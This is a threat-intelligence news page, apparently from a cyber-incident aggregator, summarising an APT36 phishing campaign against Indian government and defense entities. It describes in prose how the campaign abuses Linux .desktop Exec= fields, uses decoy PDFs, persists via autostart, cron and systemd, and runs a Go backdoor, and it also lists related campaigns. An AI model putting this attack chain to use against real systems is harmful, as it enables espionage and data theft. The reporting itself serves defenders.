Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

APT36 Linux .desktop phishing campaign against Indian government and defense entities

Campaign
First reported
Last updated
Happening score
H score 51
1 unique sources, 1 articles

Summary

Hide ▲

The APT36 campaign is using malicious Linux .desktop files in phishing ZIPs to target government and defense entities in India, creating risk of data exfiltration and persistent espionage access. The operation was first spotted on August 1, 2025 and remains ongoing. The delivery chain abuses the `.desktop` `Exec=` field to fetch and run a payload while hiding execution behind a benign-looking PDF decoy.

Related Happenings

NosyDoor backdoor activity using OneDrive and Google Drive C&C

Malware Activity
First: 18.12.2025 19:34 Last: 18.12.2025 19:34 Sources 1

About this happening: The **NosyDoor** backdoor is being used to **exfiltrate files** and run **shell commands** inside compromised networks, making the **LongNosedGoblin** toolset more dangerous. The...

Open Happening

APT42 SpearSpecter espionage campaign

Campaign
First: 14.11.2025 16:40 Last: 14.11.2025 16:40 Sources 1

About this happening: The **APT42** **SpearSpecter** campaign is **ongoing**, and it is targeting **senior defense and government officials** with personalized social engineering that also reaches **fa...

Open Happening

TransparentTribe BOSS Linux phishing espionage campaign

Campaign
First: 23.10.2025 18:30 Last: 23.10.2025 18:30 Sources 1

About this happening: A **TransparentTribe / APT36** espionage campaign targeting **Indian government Linux systems** has been uncovered, showing an updated phishing operation built around **dedicated...

Open Happening

TikTok activation-guide ClickFix infostealer campaign

Campaign
First: 19.10.2025 21:28 Last: 19.10.2025 21:28 Sources 1

About this happening: A **TikTok**-based **ClickFix** campaign is using fake **free activation guides** to deliver **info-stealing malware**, putting users seeking software activations at risk of **cre...

Open Happening

CAPI Backdoor phishing ZIP campaign targeting Russian automobile and e-commerce sectors

Campaign
First: 18.10.2025 14:41 Last: 18.10.2025 14:41 Sources 1

About this happening: A new **CAPI Backdoor** campaign is targeting **Russian automobile and e-commerce sectors**, using **phishing emails** with **ZIP archives** to deliver malware that can steal brow...

Open Happening

Timeline

  1. 22.08.2025 21:35 1 articles · 9mo ago

    APT36 phishing ZIP attacks first spotted in India

    Exploitation Observed

    APT36 began phishing-delivered ZIP campaigns against government and defense entities in India, disguising a malicious Linux `.desktop` launcher as a PDF and using the launcher to fetch and execute a payload, present a benign decoy PDF, and establish persistence for espionage and data exfiltration. The activity was first spotted on August 1, 2025 and remained ongoing.

    Show sources
    Open in new tab
  2. 22.08.2025 21:35 1 articles · 9mo ago

    CYFIRMA and CloudSEK detail APT36 Linux launcher abuse

    Technical Analysis Update

    CYFIRMA and CloudSEK describe APT36's campaign against government and defense entities in India, noting phishing-delivered ZIP archives that hide a malicious Linux `.desktop` launcher, abuse the `Exec=` field to write payloads under `/tmp/`, fetch code from an attacker server or Google Drive, launch a decoy PDF in Firefox, and use `X-GNOME-Autostart-enabled=true`, cron jobs, and systemd services for persistence. The payload is described as a Go-based ELF executable that supports data exfiltration and remote command execution over a bi-directional WebSocket channel.

    Show sources
    Open in new tab